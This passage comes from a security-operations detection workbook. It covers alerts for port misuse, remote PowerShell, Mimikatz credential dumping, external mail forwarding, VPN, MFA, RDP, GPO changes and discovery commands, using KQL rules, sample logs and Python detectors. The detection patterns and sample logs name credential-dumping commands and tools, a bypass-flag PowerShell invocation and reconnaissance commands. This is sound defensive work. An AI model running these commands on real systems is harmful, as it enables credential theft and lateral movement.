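    return {"SourceIP": flow["SourceIP"], "DestinationIP": flow["DestinationIP"],
            "DestinationPort": flow["DestinationPort"], "Expected": expected,
            "Observed": observed, "Verdict": verdict}


# Constructed flows: SSH on 443, a real TLS ClientHello, plain HTTP, SMB on 80, random bytes.
SAMPLE_FLOWS = [
    {"SourceIP": "10.10.22.34", "DestinationIP": "192.0.2.18", "DestinationPort": 443,
     "FirstBytes": b"SSH-2.0-OpenSSH_9.6\r\n"},
    {"SourceIP": "10.10.22.35", "DestinationIP": "192.0.2.20", "DestinationPort": 443,
     "FirstBytes": b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"},
    {"SourceIP": "10.10.22.36", "DestinationIP": "192.0.2.21", "DestinationPort": 80,
     "FirstBytes": b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n"},
    {"SourceIP": "10.10.22.37", "DestinationIP": "192.0.2.22", "DestinationPort": 80,
     "FirstBytes": b"\x00\x00\x00\x2f\xfeSMB@\x00"},
    {"SourceIP": "10.10.22.38", "DestinationIP": "192.0.2.23", "DestinationPort": 443,
     "FirstBytes": b"\x8a\x1f\x33\xc0\x7d\x11\x52\xee"},
]


def suspicious_flows(flows):
    """Flows that need analyst attention: protocol mismatches and unclassified payloads."""
    findings = [check_flow(f) for f in flows]
    return [f for f in findings if f["Verdict"] in ("mismatch", "unclassified")]


if __name__ == "__main__":
    for finding in suspicious_flows(SAMPLE_FLOWS):
        print(finding)
```

The "unclassified" verdict is deliberately kept apart from "mismatch": a flow on 443 that is not TLS and not any known plaintext protocol is exactly the "custom malware C2 using HTTP ports for binary or encrypted data" case in the list above, but it needs the full-capture inspection from the response actions before it can be called malicious.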
MITRE ATT&CK Mapping
Tactic: Command and Control
Techniques: T1071.001 – Application Layer Protocol: Web Traffic; T1095 – Non-Application Layer Protocol
Explanation:
Malicious actors frequently mask their traffic under common ports like 443 (HTTPS) to
evade basic firewall rules and outbound restrictions.
Network Log Entry
{
"TimeGenerated": "2025-04-23T04:10:32Z",
"SourceIP": "10.10.22.34",
"DestinationIP": "192.0.2.18",
"DestinationPort": 443,
"DetectedProtocol": "SSH",
"BytesSent": 52340,
"BytesReceived": 17430,
"SessionDuration": "00:02:11"
}
Threat Behavior Indicators
• Port 80/443 traffic that does not match web protocol patterns
• Long-lived sessions over ports typically used for short HTTP bursts
• IDS/IPS alert for protocol mismatch or custom tunneling
• No SNI or invalid TLS handshakes during SSL negotiation
Response Actions
1. Inspect full packet capture or reconstruct session to confirm misuse
2. Block the specific IP or fingerprinted traffic if confirmed malicious
3. Deploy DPI rules or SSL inspection for deeper traffic classification
4. Review proxy/firewall rules to enforce application-layer enforcement
5. Hunt for lateral movement attempts using disguised ports
6. Educate teams on expected protocol-port combinations in the environment
26. Alert Name: Remote PowerShell Execution from Unauthorised Host
Alert Logic
Objective: Detect PowerShell remoting (example, using Invoke-Command, Enter-PSSession
or WinRM) initiated from endpoints that are not allowed to perform administrative tasks,
often signalling lateral movement or attacker hands-on-keyboard actions.
Data Sources:
• Sysmon (Event ID 1 – process creation)
• Windows Event Logs (Event ID 4104 – PowerShell ScriptBlock)
• WinRM service logs
• EDR telemetry
Detection Logic (KQL – Sysmon + EDR):
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has_any ("Invoke-Command", "Enter-PSSession", "New-PSSession")
| where DeviceName !in ("IT-ADMIN-01", "MGMT-JUMPHOST")
| extend Alert = "Unauthorised remote PowerShell execution"
Alternate (Windows PowerShell Logs – Event ID 4104):
SecurityEvent
| where EventID == 4104
| where ScriptBlockText has_any ("New-PSSession", "Invoke-Command")
| where AccountName !startswith "svc" and AccountName !contains "admin"
MITRE ATT&CK Mapping
Tactic: Lateral Movement
Techniques: T1021.006 – Remote Services: PowerShell Remoting; T1059.001 – Command and Scripting Interpreter: PowerShell
Explanation:
Adversaries often use PowerShell remoting (via WinRM) after initial access to execute
commands on remote hosts with stolen credentials.
PowerShell Log Entry (Sysmon + ScriptBlock)
{
"TimeGenerated": "2025-04-23T04:23:47Z",
"DeviceName": "FINANCE-PC22",
"UserName": "roslan.azhar@company.com",
"FileName": "powershell.exe",
"CommandLine": "powershell.exe -ExecutionPolicy Bypass -Command Invoke-Command -ComputerName HR-PRINT01 -ScriptBlock { Get-Process }",
"RemoteHost": "HR-PRINT01"
}
Threat Behavior Indicators
• PowerShell remoting invoked from user workstations instead of jump servers
• No prior history of the user using WinRM or PowerShell remote admin tools
• Use of -ExecutionPolicy Bypass and -EncodedCommand in command line
• Correlated logon events from same source followed by remote execution
Response Actions
1. Validate whether the host/user is permitted for remote PowerShell
2. Inspect target host for follow-up actions (example, persistence, credential
dumping)
3. Restrict PowerShell remoting via GPO or role-based access control
4. Deploy script block logging and monitor for encoded/invoked command abuse
5. Alert on non-jump host initiating WinRM connections
6. Quarantine host if lateral movement confirmed and review login sources
27. Alert Name: Mimikatz Tool Execution or Similar Credential Dumping Tool Detected
Alert Logic
Objective: Detect attempts to extract credentials from memory using tools like Mimikatz,
LaZagne, SafetyKatz or other custom credential dumping tools, a high-fidelity indicator of
adversary post-exploitation activity.
Data Sources:
• EDR (Microsoft Defender for Endpoint, CrowdStrike, SentinelOne)
• Sysmon (Event ID 1 – process creation, Event ID 10 – WMI activity)
• Memory scanning / behavioural detection engines
Detection Logic (KQL – Process Monitoring & Signature Matching):
DeviceProcessEvents
| where FileName has_any ("mimikatz.exe", "mimi.exe", "Invoke-Mimikatz", "LaZagne.exe", "DumpCreds.exe")
    or ProcessCommandLine has_any ("sekurlsa::logonpasswords", "privilege::debug", "token::elevate")
| extend Alert = "Credential dumping tool execution detected"
Alternate (Behaviour-Based – Without Exact Filename):
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "Invoke-Mimikatz"
EDR Tools: May detect this by signature (hash), behaviour (suspicious memory reads) or
through AMSI integration in PowerShell environments.
MITRE ATT&CK Mapping
Tactic Credential Access
Techniques T1003.001 – OS Credential Dumping: LSASS Memory
T1003.004 – DCSync, T1555.003 – Credentials from Password Stores
Explanation:
Credential dumping is a post-exploitation step used to pivot across systems or maintain
persistence through password reuse or golden ticket attacks.
EDR Log (Process Execution)
{
"TimeGenerated": "2025-04-23T04:37:25Z",
"DeviceName": "MGMT-SERVER01",
"UserName": "muhammad.fairuz@company.com",
"FileName": "mimikatz.exe",
"ProcessCommandLine": "mimikatz.exe privilege::debug sekurlsa::logonpasswords",
"MD5": "fd6c1e6ae5588e9873d108e8ffdf9b42",
"SHA256": "c1219b0b3e94ce5482a6e9bdbd8b7e7ab33..."
}
Threat Behavior Indicators
• Known credential dumping tools executed (by name, hash, behaviour)
• Use of privilege::debug, sekurlsa::logonpasswords or wdigest::credentials
• LSASS access attempts (memory handle open with full permissions)
• Rare or first-time execution on sensitive systems (example, domain controllers)
Response Actions
1. Immediately isolate the host from the network
2. Terminate the offending process and collect a memory dump for forensic analysis
3. Investigate LSASS access patterns and any subsequent credential reuse
4. Reset credentials for impacted users or service accounts
5. Block known tool hashes and behaviour patterns via EDR
6. Enable Windows security settings (example, LSA protection, Credential Guard)
28. Alert Name: New Inbox Rule Created to Auto-Forward Emails Externally
Alert Logic
Objective: Detect suspicious inbox rule creation configured to auto-forward emails to
external addresses, a common tactic in business email compromise (BEC) and espionage
operations.
Data Sources:
• Microsoft 365 Unified Audit Logs
• Exchange Online (Mailbox audit logs)
• Google Workspace admin logs (Gmail rule changes)
• Email security platforms (example, Proofpoint, Mimecast)
Detection Logic (KQL – M365 Audit Logs):
AuditLogs
| where OperationName == "New-InboxRule"
| where Parameters has_any ("ForwardTo", "RedirectTo")
| where Parameters contains "@"
| where Parameters matches regex "(@(?!company\\.com))"
| extend Alert = "External auto-forwarding rule created"
Alternate (Exchange MailboxAuditLogs):
OfficeActivity
| where Operation == "Set-Mailbox" and Parameters contains "ForwardingSmtpAddress"
| where Parameters contains "@"
| where Parameters !contains "company.com"
MITRE ATT&CK Mapping
Tactic Collection, Exfiltration
Techniques T1114.003 – Email Collection via Mail Forwarding Rule
T1020 – Automated Exfiltration
Explanation:
Attackers use inbox rules to silently forward sensitive conversations (example, finance,
HR, legal) to external mailboxes. This often follows successful phishing or credential theft.
Audit Log Entry (Microsoft 365)
{
"TimeGenerated": "2025-04-23T04:50:49Z",
"UserPrincipalName": "hasniza.farhana@company.com",
"OperationName": "New-InboxRule",
"RuleName": "ForwardAll",
"ForwardTo": "externalreport@attacker-domain[.]com",
"Conditions": "Apply to all messages",
"ClientIP": "192.0.2.55",
"Application": "Outlook Web Access"
}
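The domain test is the fragile part of this rule: `!contains "company.com"` passes a look-alike such as `archive@company.com.evil-example.net`, and the negative-lookahead regex has the same gap, while recipients can arrive defanged (`[.]`), `smtp:`-prefixed, or as `Name <address>`. The Python below is an added example, not the workbook's own detection logic: it re-implements the check over the audit entry above plus three constructed events. `INTERNAL_DOMAINS`, the forwarding-parameter list and the constructed events are assumptions.

```python
import re

# Constructed input: the workbook's audit entry for this alert plus three
# constructed cases (internal forward, look-alike domain, tenant subdomain).
AUDIT_EVENTS = [
    {
        "TimeGenerated": "2025-04-23T04:50:49Z",
        "UserPrincipalName": "hasniza.farhana@company.com",
        "OperationName": "New-InboxRule",
        "RuleName": "ForwardAll",
        "ForwardTo": "externalreport@attacker-domain[.]com",   # defanged, as reported
        "ClientIP": "192.0.2.55",
    },
    {   # constructed: forward to a colleague, stays inside the tenant
        "UserPrincipalName": "user.one@company.com",
        "OperationName": "New-InboxRule",
        "RuleName": "Delegate",
        "RedirectTo": "manager@company.com",
    },
    {   # constructed: look-alike domain; a plain `contains "company.com"` test passes it
        "UserPrincipalName": "user.two@company.com",
        "OperationName": "Set-Mailbox",
        "ForwardingSmtpAddress": "smtp:archive@company.com.evil-example.net",
    },
    {   # constructed: a real subdomain of the tenant, legitimate
        "UserPrincipalName": "user.three@company.com",
        "OperationName": "Set-InboxRule",
        "RuleName": "Tickets",
        "ForwardAsAttachmentTo": "Helpdesk <helpdesk@mail.company.com>",
    },
]

INTERNAL_DOMAINS = {"company.com"}   # assumption: the tenant's accepted domains
FORWARD_PARAMS = ("ForwardTo", "RedirectTo", "ForwardAsAttachmentTo",
                  "ForwardingSmtpAddress", "ForwardingAddress")
RULE_OPERATIONS = ("New-InboxRule", "Set-InboxRule", "Set-Mailbox")


def refang(value):
    """Undo the common defanging styles so the domain can be compared."""
    return value.replace("[.]", ".").replace("(.)", ".").replace("[@]", "@")


def domain_of(recipient):
    """Domain of a recipient in any of the forms the audit logs carry:
    plain address, 'smtp:'-prefixed address, or 'Display Name <address>'."""
    addr = refang(recipient).strip().lower()
    bracketed = re.search(r"<([^>]+)>", addr)
    if bracketed:
        addr = bracketed.group(1)
    if addr.startswith("smtp:"):
        addr = addr[5:]
    if "@" not in addr:
        return None
    return addr.rsplit("@", 1)[1].strip(".")


def is_internal(domain):
    # Exact match or a true subdomain; "company.com.evil-example.net" is neither.
    return any(domain == d or domain.endswith("." + d) for d in INTERNAL_DOMAINS)


def external_forwards(event):
    """Return (parameter, recipient) pairs that point outside the tenant."""
    hits = []
    for param in FORWARD_PARAMS:
        value = event.get(param)
        if not value:
            continue
        for recipient in (value if isinstance(value, list) else [value]):
            domain = domain_of(recipient)
            if domain and not is_internal(domain):
                hits.append((param, refang(recipient)))
    return hits


def detect(events):
    """Alert on every rule/mailbox change that forwards mail externally."""
    alerts = []
    for event in events:
        if event.get("OperationName") not in RULE_OPERATIONS:
            continue
        hits = external_forwards(event)
        if hits:
            alerts.append({
                "user": event.get("UserPrincipalName"),
                "rule": event.get("RuleName"),
                "targets": hits,
                "Alert": "External auto-forwarding rule created",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(AUDIT_EVENTS):
        print(alert)
```

Running it flags the workbook entry and the look-alike domain only; the delegate forward and the `mail.company.com` subdomain are left alone. The suffix test in `is_internal` is the piece to carry back into the SIEM rule, whatever query language it ends up in.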
Threat Behavior Indicators
• Inbox rules that forward all or specific messages externally
• Rule created via OWA or legacy protocols (less visibility)
• No user awareness of rule creation (i.e., not admin or legitimate automation)
• Unusual external domains or free email services (example, Gmail, ProtonMail, Mail.ru)
Response Actions
1. Immediately remove the malicious inbox rule
2. Notify and verify with the affected user
3. Search email history for signs of impersonation or credential reuse
4. Force password reset and MFA re-registration
5. Enable rule creation alerting in M365 Security & Compliance Center
6. Restrict auto-forwarding to only approved external domains (or block entirely)
29. Alert Name: Suspicious VPN Login Not Followed by Normal Application Access
Alert Logic
Objective: Detect potential credential abuse or reconnaissance activity where a VPN login
occurs but is not followed by expected application usage, indicating possible account
compromise, testing or staging activity.
Data Sources:
• VPN logs (example, Cisco ASA, Palo Alto GlobalProtect, Fortinet, OpenVPN)
• Web proxy logs / NetFlow / SIEM
• Application access logs (example, SAP, ERP, Salesforce, M365)
Detection Logic (KQL – VPN Log with Missing App Access):
let VPNLogins = VPNAuthenticationLogs
| where TimeGenerated > ago(1h) and EventResult == "Success"
| project User, SourceIP, LoginTime = TimeGenerated;
let AppAccess = AppUsageLogs
| where TimeGenerated > ago(1h)
| summarize FirstAccess = min(TimeGenerated) by User;
VPNLogins
| where LoginTime < ago(10m) // give the session time to reach an application before alerting
| join kind=leftanti (AppAccess) on User
| extend Alert = "VPN login not followed by expected application access"
Alternate Logic (Behavioural Baseline Comparison):
• Detect logins with no subsequent HTTP/S connections to corporate web apps
• Compare against user's past login-to-usage behaviour (example, logon with no proxy activity in 10 minutes)
MITRE ATT&CK Mapping
Tactic Initial Access, Defense Evasion
Techniques T1078 – Valid Accounts
T1036 – Masquerading (inactive logins, no engagement)
Explanation:
Adversaries who gain access via stolen credentials often perform login tests or establish
persistence before engaging further; a gap between login and actual usage can indicate this
staging phase.
VPN Log Entry
{
"TimeGenerated": "2025-04-23T05:04:03Z",
"User": "hafiza.rahim@company.com",
"SourceIP": "102.68.75.109",
"VPNGateway": "vpn-secure.company.com",
"LoginResult": "Success",
"AuthenticationMethod": "Password+MFA",
"Location": "Nigeria"
}
Absence of Follow-up Activity
• No DNS queries, HTTP/S sessions or SaaS app logins
• Session remains idle or ends after authentication
Threat Behavior Indicators
• VPN login from unexpected country or anonymised IP
• Session duration is short or completely idle
• No access to enterprise tools like SharePoint, Teams, CRM, etc.
• First login from device not seen before (unknown device fingerprint)
Response Actions
1. Revoke session token and log off VPN connection
2. Force password reset and review MFA configuration
3. Correlate with login device, geolocation and previous behaviour
4. Enable adaptive conditional access (example, allow only device + app access in tandem)
5. Alert on idle VPN sessions beyond a short timeout
6. Use deception services or fake apps to observe adversary behaviour if repeated
30. Alert Name: Failed Multi-Factor Authentication (MFA) Attempts Exceeding Threshold
Alert Logic
Objective: Detect repeated failed MFA attempts, which may indicate credential
compromise, MFA bypass attempts or MFA fatigue attacks (push bombing).
Data Sources:
• Identity provider logs (Azure AD, Okta, Duo, Google Workspace)
• Conditional Access logs
• SIEM aggregations of authentication attempts
Detection Logic (KQL – Azure AD Sign-in Logs Example):
SigninLogs
| where toint(Status.errorCode) in (500121, 50074, 50076)
| summarize MFA_Failures = count(), FirstFail = min(TimeGenerated), LastFail = max(TimeGenerated)
    by UserPrincipalName, IPAddress, bin(TimeGenerated, 1h)
| where MFA_Failures > 5
| extend Alert = "Excessive failed MFA attempts detected"
Common Azure AD MFA Failure Codes:
• 500121: MFA required but not satisfied
• 50074: User did not complete MFA
• 50076: MFA challenge issued but no response
MITRE ATT&CK Mapping
Tactic Credential Access, Defense Evasion
Techniques T1110 – Brute Force
T1621 – Multi-Factor Authentication Request Generation (MFA fatigue)
Explanation:
Attackers who hold valid credentials may trigger repeated MFA requests (example, via push)
in the hope that the user eventually accepts one, or they may attempt to brute-force the
MFA mechanism itself.
Log Entry (Azure AD Sign-In Failure)
{
"TimeGenerated": "2025-04-23T05:15:32Z",
"UserPrincipalName": "aidil.basri@company.com",
"IPAddress": "185.132.1.99",
"Status": {
"errorCode": 50076,
"failureReason": "User did not complete MFA challenge"
},
"Location": "Netherlands",
"ClientAppUsed": "Browser",
"AttemptCount": 8
}
Threat Behavior Indicators
• Repeated failed MFA prompts within a short time window (example, <1 hour)
• Unusual IP or geolocation not tied to normal user behaviour
• Use of automated tools or scripts to simulate repeated MFA requests
• Account targeted across multiple services or applications
Response Actions
1. Temporarily lock the account if under attack
2. Force reset of user credentials and MFA method (example, re-register device)
3. Enable number matching or phishing-resistant MFA (example, FIDO2, certificate-based)
4. Investigate IP source and block at perimeter if malicious
5. Alert SOC if similar patterns are detected across multiple users (spray attack)
6. Educate users on MFA fatigue attacks and when to report suspicious prompts
31. Alert Name: Lateral Movement Using RDP from a Non-Jump Host
Alert Logic
Objective: Detect unauthorised lateral movement attempts via Remote Desktop Protocol
(RDP) originating from endpoints not designated as jump servers or IT admin consoles.
Data Sources:
• Windows Security Logs (Event ID 4624 – Successful Logon, LogonType 10)
• Sysmon (Event ID 3 – Network connection)
• EDR (with network telemetry)
• Firewall or NDR logs (for internal RDP port usage)
Detection Logic (KQL – Windows Logon + Host Validation):
SecurityEvent
| where EventID == 4624 and LogonType == 10
// 4624 is logged on the target host; the initiating host is WorkstationName / IpAddress
| where WorkstationName !in ("JUMP-HOST-01", "IT-CONSOLE-02")
| summarize RDPLogins = count() by Computer, TargetUserName, WorkstationName, IpAddress, bin(TimeGenerated, 1h)
| where RDPLogins > 0
| extend Alert = "Lateral RDP login from non-jump host"
Alternate (Sysmon – Network Connection to Port 3389):
Sysmon
| where EventID == 3
| where DestinationPort == 3389
| where InitiatingProcessAccountName !startswith "admin"
| where SourceComputerName !in ("JumpServer01", "InfraAdmin01")
MITRE ATT&CK Mapping
Tactic Lateral Movement
Techniques T1021.001 – Remote Services: RDP
T1078.001 – Valid Accounts: Local/Domain Accounts
Explanation:
Adversaries use RDP with valid credentials to pivot laterally, but doing so from user
endpoints (not jump hosts) often violates security policy and may indicate compromise.
Log Entry (Event ID 4624 – RDP from Non-Admin Host)
{
"EventID": 4624,
"TimeGenerated": "2025-04-23T05:32:44Z",
"LogonType": 10,
"Computer": "SALES-LAPTOP22",
"TargetUserName": "backupadmin",
"IpAddress": "10.20.30.45",
"AuthenticationPackage": "Negotiate",
"ProcessName": "rdpclip.exe"
}
Threat Behavior Indicators
• RDP session initiated from a workstation or business user endpoint
• Target system is a server or critical infrastructure node
• No ticketing/change record indicating legitimate administrative task
• Account used is elevated but host is unmanaged
Response Actions
1. Terminate the RDP session and isolate the initiating endpoint
2. Investigate for signs of credential theft or token impersonation
3. Restrict RDP initiation to approved jump hosts via GPO/firewall
4. Enable RDP session logging and clipboard/file redirection control
5. Review user account access privileges and group memberships
6. Search for follow-up activities such as scheduled tasks or service installs
32. Alert Name: Rare or First-Time Login from Specific Device or Location
Alert Logic
Objective: Detect user login attempts from a device or geographical location that has
never been observed before for that user, often a strong indicator of compromised
credentials or unauthorised access.
Data Sources:
• Identity provider logs (Azure AD, Okta, Google Workspace)
• VPN logs
• Endpoint detection platforms
• Threat intelligence (for geolocation validation)
Detection Logic (KQL – Azure AD / SIEM):
let HistoricalLogins = SigninLogs
| where ResultType == 0
| where TimeGenerated between (ago(30d) .. ago(1h)) // baseline must exclude the logins being scored
| summarize KnownDevices = make_set(tostring(DeviceDetail.deviceId)),
            KnownLocations = make_set(tostring(Location.city)) by UserPrincipalName;
SigninLogs
| where TimeGenerated > ago(1h) and ResultType == 0
| join kind=inner (HistoricalLogins) on UserPrincipalName
| where not(set_has_element(KnownDevices, tostring(DeviceDetail.deviceId)))
    or not(set_has_element(KnownLocations, tostring(Location.city)))
| extend Alert = "First-time login from unknown device or location"
Alternate Logic (UEBA-style):
• Track login origin frequency for each user
• Trigger alert on count = 1 for new device/location tuple within a time window
MITRE ATT&CK Mapping
Tactic Initial Access, Credential Access
Techniques T1078 – Valid Accounts
T1036 – Masquerading (device or location impersonation)
Explanation:
Adversaries using stolen credentials will often access accounts from unfamiliar systems or
locations, triggering anomalies in user login patterns.
Sign-in Log Entry
{
"TimeGenerated": "2025-04-23T05:45:00Z",
"UserPrincipalName": "izzah.zulkarnain@company.com",
"DeviceId": "UNKNOWN-DEVICE-9123",
"DeviceOSType": "macOS",
"ClientAppUsed": "Browser",
"IPAddress": "104.26.23.17",
"Location": {
"city": "Lyon",
"countryOrRegion": "FR"
},
"ResultType": 0
}
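A first-seen rule has one trap: if the baseline is computed over the same rows being scored, the current device and city are always already "known" and the rule never fires; a second is that a brand-new account has no history and would alert on its first legitimate login. The Python below is an added example, not the workbook's own logic: it scores each successful sign-in against only the user's earlier successes, skips users with too little history, and ignores failed attempts when building the baseline. The sign-in history (apart from the workbook's sample event), the 90-day lookback and `min_history` are constructed assumptions.

```python
from datetime import datetime, timedelta


def ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


# Constructed sign-in history for one user, ending with the workbook's sample event.
# Fields are flattened from the SigninLogs shape (DeviceDetail.deviceId, Location.city).
USER = "izzah.zulkarnain@company.com"
SIGNINS = [
    {"TimeGenerated": "2025-03-20T08:01:00Z", "UserPrincipalName": USER,
     "DeviceId": "LAPTOP-IZ01", "City": "Kuala Lumpur", "ResultType": 0},
    {"TimeGenerated": "2025-04-01T08:15:00Z", "UserPrincipalName": USER,
     "DeviceId": "LAPTOP-IZ01", "City": "Kuala Lumpur", "ResultType": 0},
    {"TimeGenerated": "2025-04-10T09:12:00Z", "UserPrincipalName": USER,
     "DeviceId": "LAPTOP-IZ01", "City": "Kuala Lumpur", "ResultType": 0},
    {"TimeGenerated": "2025-04-22T18:40:00Z", "UserPrincipalName": USER,
     "DeviceId": "LAPTOP-IZ01", "City": "Penang", "ResultType": 0},
    # failed attempt from the unknown device: must not seed the baseline
    {"TimeGenerated": "2025-04-23T05:40:00Z", "UserPrincipalName": USER,
     "DeviceId": "UNKNOWN-DEVICE-9123", "City": "Lyon", "ResultType": 50126},
    # the workbook's sample event
    {"TimeGenerated": "2025-04-23T05:45:00Z", "UserPrincipalName": USER,
     "DeviceId": "UNKNOWN-DEVICE-9123", "City": "Lyon", "ResultType": 0},
]


def baseline(events, user, before, lookback_days=90):
    """Devices and cities from successful sign-ins strictly before `before`.
    The event being scored is excluded; if it were included, every device and
    city would already be "known" and the rule could never fire."""
    start = before - timedelta(days=lookback_days)
    devices, cities, prior = set(), set(), 0
    for e in events:
        if e["UserPrincipalName"] != user or e["ResultType"] != 0:
            continue
        t = ts(e["TimeGenerated"])
        if start <= t < before:
            devices.add(e["DeviceId"])
            cities.add(e["City"])
            prior += 1
    return devices, cities, prior


def evaluate(events, min_history=3):
    """Score each successful sign-in against the user's own earlier history."""
    alerts = []
    for e in sorted(events, key=lambda x: ts(x["TimeGenerated"])):
        if e["ResultType"] != 0:
            continue
        t = ts(e["TimeGenerated"])
        devices, cities, prior = baseline(events, e["UserPrincipalName"], t)
        if prior < min_history:
            continue   # too little history: a new account is not an anomaly
        reasons = []
        if e["DeviceId"] not in devices:
            reasons.append("new device: " + e["DeviceId"])
        if e["City"] not in cities:
            reasons.append("new city: " + e["City"])
        if reasons:
            alerts.append({"user": e["UserPrincipalName"], "time": e["TimeGenerated"],
                           "reasons": reasons,
                           "Alert": "First-time login from unknown device or location"})
    return alerts


if __name__ == "__main__":
    for alert in evaluate(SIGNINS):
        print(alert)
```

On this history the Penang login of 22 April fires on "new city" only (same laptop), and the Lyon login fires on both device and city; the three earlier Kuala Lumpur logins never alert because they are the baseline. Tune `min_history` and the lookback to the tenant's churn; the correlation bullet under Response Actions is exactly this baseline in human hands.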
Threat Behavior Indicators
• Device ID or OS never seen before in historical logs
• Login from a new country or city not associated with user travel
• First login from VPN or anonymous source (example, datacenter IP)
• No prior login tokens or trusted devices associated with account
Response Actions
1. Trigger real-time MFA challenge or user verification
2. Force sign-out from all sessions and reset credentials
3. Correlate with previous login history and behavioural baseline
4. Geofence logins using conditional access policies
5. Audit any access or file sharing performed after the login
6. Educate users about device enrollment and phishing threats
33. Alert Name: Changes to Critical Group Policy Objects (GPO) in Active Directory
Alert Logic
Objective: Detect unauthorised or unexpected changes to Group Policy Objects (GPOs)
which can be used to deploy malware, disable security tools or create persistent access
across systems.
Data Sources:
• Windows Security Logs (Event ID 5136 – Directory service change)
• AD monitoring tools (example, ADAudit Plus, Netwrix, Quest)
• SIEM with LDAP audit ingestion
Detection Logic (KQL – Windows Event + GPO Context):
SecurityEvent
| where EventID == 5136
| where ObjectClass == "groupPolicyContainer"
| where AttributeName in ("gPCFileSysPath", "gPCUserExtensionNames", "gPCMachineExtensionNames")
| where SubjectUserName !startswith "admin" and SubjectUserName !contains "svc"
| extend Alert = "Critical GPO modification detected"
Alternative Logic:
• Monitor sysvol changes for .adm/.admx/.xml files
• Track high-risk policy modifications (example, disable Defender, allow unsigned drivers)
MITRE ATT&CK Mapping
Tactic Defense Evasion, Persistence
Techniques T1484.001 – Domain Policy Modification: GPO
T1053.005 – Scheduled Task via GPO
Explanation:
Threat actors (example, APTs, ransomware gangs) may modify GPOs to weaken security
posture or deliver payloads across the domain.
Security Log Entry (Event ID 5136)
{
"EventID": 5136,
"TimeGenerated": "2025-04-23T06:00:42Z",
"SubjectUserName": "noraini.yusof",
"ObjectClass": "groupPolicyContainer",
"ObjectDN": "CN={A1B2C3D4},CN=Policies,CN=System,DC=corp,DC=company,DC=com",
"AttributeName": "gPCFileSysPath",
"OldValue": "\\\\DC01\\SYSVOL\\corp.company.com\\Policies\\{A1B2C3D4}",
"NewValue": "\\\\DC01\\SYSVOL\\corp.company.com\\Policies\\{A1B2C3D4}\\new_payload.xml"
}
Threat Behavior Indicators
• GPO edited by a non-IT or unexpected account
• Policy changes that disable Defender or Windows Update
• Changes pushed outside change window or after hours
• Extension of GPO to previously unaffected OUs or computers
Response Actions
1. Review and roll back unauthorised GPO changes immediately
2. Quarantine and investigate the user or system that initiated the change
3. Audit which systems were impacted by the updated GPO
4. Enable alerts for changes to specific GPO attributes and files
5. Restrict GPO edit rights via tiered admin model and Just-In-Time access
6. Monitor SYSVOL replication for propagation of malicious templates or scripts
34. Alert Name: Discovery Commands Executed in Quick Succession on Endpoint
Alert Logic
Objective: Detect execution of multiple reconnaissance commands within a short
timeframe, which may indicate an adversary enumerating the environment after initial
access.
Data Sources:
• Sysmon (Event ID 1 – Process Creation)
• EDR command-line telemetry
• PowerShell ScriptBlock logs (Event ID 4104)
Detection Logic (KQL – Sysmon or EDR Style):
DeviceProcessEvents
| where ProcessCommandLine has_any (
"whoami", "net user", "net localgroup", "ipconfig", "systeminfo",
"netstat", "tasklist", "quser", "nltest", "dsquery", "wmic"
)
| summarize CmdCount = count(), UniqueCommands = dcount(ProcessCommandLine)
    by DeviceName, InitiatingProcessAccountName, bin(TimeGenerated, 5m)
| where CmdCount >= 5 and UniqueCommands >= 4
| extend Alert = "Multiple discovery commands executed in short time window"
Alternate Logic (Script-based detection):
• Look for PowerShell scripts using Get-AD*, Get-Process, Get-Net* or Invoke-Enumeration modules
MITRE ATT&CK Mapping
Tactic Discovery
Techniques T1087 – Account Discovery
T1082 – System Information Discovery
T1016 – System Network Configuration Discovery
T1033 – System Owner/User Discovery
Explanation:
Attackers or malware typically perform environment discovery shortly after gaining a
foothold, often using native commands to remain stealthy.
Process Execution Logs
[
{
"TimeGenerated": "2025-04-23T06:15:12Z",
"DeviceName": "ENG-PC47",
"UserName": "mohd.halim@company.com",
"ProcessName": "cmd.exe",
"CommandLine": "whoami"
},
{
"TimeGenerated": "2025-04-23T06:15:22Z",
"DeviceName": "ENG-PC47",
"UserName": "mohd.halim@company.com",
"ProcessName": "cmd.exe",
"CommandLine": "net user"
},
{
"TimeGenerated": "2025-04-23T06:15:35Z",
"DeviceName": "ENG-PC47",
"UserName": "mohd.halim@company.com",
"ProcessName": "cmd.exe",
"CommandLine": "ipconfig /all"
},
{
"TimeGenerated": "2025-04-23T06:15:44Z",
"DeviceName": "ENG-PC47",
"UserName": "mohd.halim@company.com",
"ProcessName": "cmd.exe",
"CommandLine": "systeminfo"
},
{
"TimeGenerated": "2025-04-23T06:15:59Z",
"DeviceName": "ENG-PC47",
"UserName": "mohd.halim@company.com",
"ProcessName": "cmd.exe",
"CommandLine": "netstat -an"
}
]
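Two details decide whether this rule is usable: the match must be on the command that actually ran (a full path such as `C:\Windows\System32\whoami.exe`, or `net user` as opposed to `net use`), and the window should slide rather than fall on fixed 5-minute bin edges, otherwise a burst straddling a bin boundary is missed. The Python below is an added example, not the workbook's own logic: it classifies each command line, then runs a sliding 5-minute window per device and user over the five sample events above plus a constructed benign user. The event helper, the benign user and the thresholds are assumptions taken from the rule text.

```python
import re
from datetime import datetime, timedelta

# The command list from the rule above; two-word "net" subcommands are kept whole.
RECON = {"whoami", "net user", "net localgroup", "ipconfig", "systeminfo",
         "netstat", "tasklist", "quser", "nltest", "dsquery", "wmic"}


def _ev(t, device, user, cmd):
    return {"TimeGenerated": t, "DeviceName": device, "UserName": user,
            "ProcessName": "cmd.exe", "CommandLine": cmd}


# The workbook's five sample events, plus a constructed benign user (FIN-PC03)
# who runs ipconfig twice an hour apart and must not trigger the rule.
EVENTS = [
    _ev("2025-04-23T06:15:12Z", "ENG-PC47", "mohd.halim@company.com", "whoami"),
    _ev("2025-04-23T06:15:22Z", "ENG-PC47", "mohd.halim@company.com", "net user"),
    _ev("2025-04-23T06:15:35Z", "ENG-PC47", "mohd.halim@company.com", "ipconfig /all"),
    _ev("2025-04-23T06:15:44Z", "ENG-PC47", "mohd.halim@company.com", "systeminfo"),
    _ev("2025-04-23T06:15:59Z", "ENG-PC47", "mohd.halim@company.com", "netstat -an"),
    _ev("2025-04-23T06:00:00Z", "FIN-PC03", "finance.user@company.com", "ipconfig"),
    _ev("2025-04-23T07:00:00Z", "FIN-PC03", "finance.user@company.com", "ipconfig"),
]


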